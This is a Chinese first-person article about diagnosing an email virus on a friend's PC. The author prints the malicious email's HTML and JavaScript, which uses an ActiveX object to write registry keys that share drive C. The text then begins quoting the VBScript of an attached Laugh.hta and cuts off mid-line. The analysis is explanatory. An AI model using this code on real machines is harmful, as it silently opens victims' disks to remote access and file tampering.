最近网络上的邮件病毒满天飞舞，令人防不胜防。小弟的邮箱地址也不知怎么被添加到几份邮件列表中，结果现在平均下来收10封信有8封垃圾邮件。不光是广告，而且最近常有一些不明身份的邮件发到我的邮箱来，并且都带有附件，通常附件为doc和exe文件。可恶！看来不是SirCam病毒就是“求职信”病毒。Foxmail的过滤器也是杯水车薪——Spammer每天都从新的原地址发来垃圾邮件。每天收信都战战兢兢，就像是在排雷！

　　忽一日，好友打电话来求救，说机器不能启动了。我一听，就拿着工具软件一路小跑到他家，也不多问——直接开机（好友刚学电脑不久，水平肯定……），一看“缺少系统文件”，这简单，启动盘启动，“Sys A: C: ”搞定！重启，蓝天白云映入眼帘……“可能是有病毒吧，要不然系统文件会无故丢失？”我一边说一边操起鼠标。“怎么启动速度这么慢？”我问他，他摇摇头后说“昨天收了信后就成这样了，我也不知道怎么回事。”我打开Outlook Express，发现有封名为“笑林广记笑话集”的信不能读，OE提示说上一次没有正常退出，可能是由看过的最后一封邮件所引起的。我就点击“查看此邮件”，里面有一个名为Laugh.hta的附件，我试着一执行，结果硬盘灯狂闪。不对头！我立即按下三键，在任务列表中没有发现邮件病毒常见的WScript进程，倒是多了一个MSHTA的不明进程。这个进程肯定有问题，马上用“Windows优化大师”中的进程管理器杀掉了它——果然，硬盘不响了。

　　朋友说他也点过这个附件。我就打开资源管理器，首先发现C盘的盘符上有一只手托着——C盘被共享了！莫名其妙，马上改为不共享。接着又发现C盘根目录下的Io.sys大小不对——由219K变成了3K，又被病毒写坏了！我这回得好好研究你一下！再打开OE，不理会OE的关于上一次没有正常退出提示，直接双击该可疑邮件，点击菜单上的“查看”——“编辑源文件”，终于看到了它的庐山真面目。

　　〈!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"〉

　　〈HTML〉〈HEAD〉

　　〈META content="text/html; charset=gb2312" http-equiv=Content-Type〉

　　〈META content="MSHTML 5.00.2614.3500" name=GENERATOR〉

　　〈STYLE〉〈/STYLE〉

　　〈/HEAD〉

　　〈BODY bgColor=#c0c0c0〉

　　〈DIV align=center〉〈FONT size=4〉〈STRONG〉笑林广记笑话集〈/STRONG〉〈/FONT〉〈/DIV〉

　　〈DIV align=center〉 〈/DIV〉

　　〈DIV align=left〉〈FONT size=2〉

　　你好！我们是笑林广记笑话网，这里有大量的XXX级笑话，绝对笑死你！欢迎访问！附件中有极品笑话N篇，友情赠送！〈A href="http://www.sexlaugh.com.cn"〉Http://www.sexlaugh.com.cn〈/A〉〈/FONT〉〈/DIV〉

　　〈script language=JavaScript〉

　　[iduba_page]function f（）　//改写注册表的函数

　　{

　　var aa,ss;

　　aa=document.applets[0];

　　aa.setCLSID（"{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"）;

　　aa.createInstance（）;

　　ss=aa.GetObject（）;

　　ss.RegWrite（"HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManC$Flags",302,"REG_DWORD"）;

　　ss.RegWrite（"HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManC$Type",0,"REG_DWORD"）;

　　ss.RegWrite（"HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManC$Path","C:"）;

　　}

　　function init（）

　　{

　　setTimeout（"f（）", 1000）;　//每过1000毫秒就再次递归调用f（）

　　}

　　init（）;　//调用函数

　　〈/script〉

　　〈/BODY〉〈/HTML〉

　　这封邮件就是利用了MS.ActiveX元件的写注册表的功能，只要你一读这封信，它就会在注册表的HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanMan中添加了一个键值C$，并且将C盘改为完全共享！这样黑客可以用SMB扫描器直接登陆你的C盘，他可以在硬盘中随意拷贝文件，删除文件，添加文件……并且可以给你上传木马，永久而全面地控制你的机器。

　　再来看一看附件Laugh.hta吧。我查看了一下“文件类型”，发现“.hta”后缀名其实是HTML Application文件，可以由Mshta.exe解释执行。看来也是和WSH、VBS一样的文本文件，就将它导出为Txt文件——哈哈！全看到了！

　　〈html〉

　　〈script language=vbs〉

　　On Error Resume Next·　容错语句，避免程序崩溃

　　set aa=CreateObject（"WScript.Shell"）·建立WScript对象

　　Set fs = CreateObject（"Scripting.FileSystemObject"）·建立文件系统对象

　　Set dir1 = fs.GetSpecialFolder（0）·得到Windows路径

　　Set dir2 = fs.GetSpecialFolder（1）·得到System路径

　　dir1=dir1+"START MENUPROGRAMS启动"

　　aa.RegWrite"HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManS$Flags",302,"REG_DWORD"·写入Dword值Flags，这是共享类型的标志

　　aa.RegWrite"HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManS$Type",0,"REG_DWORD"·写入Dword值Type

　　aa.RegWrite"HKLMSoftwareMicrosoftWindowsCurre